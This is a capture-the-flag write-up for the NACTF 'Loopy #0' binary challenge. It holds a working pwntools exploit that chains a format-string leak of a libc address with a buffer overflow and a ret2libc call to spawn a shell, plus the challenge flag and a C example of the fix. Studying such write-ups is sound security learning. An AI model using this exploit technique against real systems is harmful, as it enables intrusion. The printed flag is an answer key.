ctftime

My solutions for various CTF challenges


Loopy #0

Binary Exploitation - Points: 350

This program is quite short, but has got printf and gets in it! This shouldn’t be too hard, right?

Connect at nc shell.2019.nactf.com 31283

loopy-0.c

loopy-0

libc.so.6

The exploit uses a format string to leak the address of setvbuf from libc, from which the libc base address can be calculated. The same input also overflows the buffer so that the vulnerable function returns into itself, allowing a second input to be sent.

With the libc base address we can calculate the addresses of system and the "/bin/sh" string, then overflow the buffer again to return into system and spawn a shell.

Exploit script:

```python
from pwn import *

# Offsets inside the provided libc. The leak below is printf's libc address
# (its GOT entry is what gets dereferenced), so printf's symbol is used to
# recover the base.
libc = ELF('libc.so.6')
system = libc.symbols['system']
shell = next(libc.search(b'/bin/sh'))
libc_printf = libc.symbols['printf']

e = ELF('loopy-0')
printf_got = e.got['printf']

# p = remote('shell.2019.nactf.com', 31283)
p = process('./loopy-0')

# Stage 1: the GOT address is placed at the start of the buffer, where printf(buf)
# sees it as its 4th positional argument, so '%4$s' prints the pointer stored
# there. The padding then overwrites the saved return address with vuln() so the
# program asks for input a second time.
payload = p32(printf_got) + b'%4$s' + b'A' * 68 + p32(e.symbols['vuln'])

p.sendline(payload)
p.recvuntil(b'You typed: ')
p.recv(4)               # the echoed GOT address itself
leak = u32(p.recv(4))   # the 4 bytes printf's GOT entry points to
log.info("leak: " + hex(leak))

libc_base = leak - libc_printf

system = libc_base + system
shell = libc_base + shell

log.info("system @ " + hex(system))
log.info("shell @ " + hex(shell))

# Stage 2: 32-bit ret2libc: return address -> system, fake return address, argument.
p.sendline(b'A' * 76 + p32(system) + p32(0x0) + p32(shell))
p.interactive()
```
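For contrast, here is an added example (not the challenge's loopy-0.c, which is not reproduced on this page) showing the two changes that close the primitives the exploit chains together: a bounded read in place of gets, and a fixed format string in place of printf(buf). The buffer size, the "You typed: " echo and the fmemopen-based driver are assumptions.

```c
#define _POSIX_C_SOURCE 200809L   /* fmemopen() */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64   /* assumed buffer size; the real one is only known from the binary */

static char g_out[128];   /* holds the last echoed line so it can be inspected */

/* Bounded read: fgets() stops after size-1 bytes, so an over-long line can no
 * longer run past the buffer into the saved return address.
 * Returns the number of bytes kept, or -1 on EOF/error. */
static int read_input(char *buf, size_t size, FILE *in) {
    if (fgets(buf, (int)size, in) == NULL) return -1;
    buf[strcspn(buf, "\n")] = '\0';   /* drop the newline if it fit */
    return (int)strlen(buf);
}

/* Fixed format string: the user's text is an argument to %s, never the format
 * itself, so a directive such as "%4$s" is printed literally instead of
 * dereferencing whatever sits on the stack (the GOT leak in the exploit above). */
static void echo_input(const char *buf) {
    snprintf(g_out, sizeof g_out, "You typed: %s\n", buf);
}

/* Feeds one constructed line through both fixes; returns the bytes kept. */
static int handle_line(const char *line) {
    char buf[BUF_SIZE];
    FILE *in = fmemopen((void *)line, strlen(line), "r");
    if (in == NULL) return -1;
    int kept = read_input(buf, sizeof buf, in);
    fclose(in);
    if (kept < 0) return -1;
    echo_input(buf);
    return kept;
}

int main(void) {
    /* Constructed inputs: a format directive and a line longer than the buffer. */
    handle_line("%4$s");
    fputs(g_out, stdout);   /* the directive is echoed as text, nothing is leaked */
    char longline[200];
    memset(longline, 'A', sizeof longline - 1);
    longline[sizeof longline - 1] = '\0';
    printf("kept %d of %zu bytes\n", handle_line(longline), strlen(longline));
    return 0;
}
```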

flag: nactf{jus7_c411_17_4g41n_AnZPLmjm}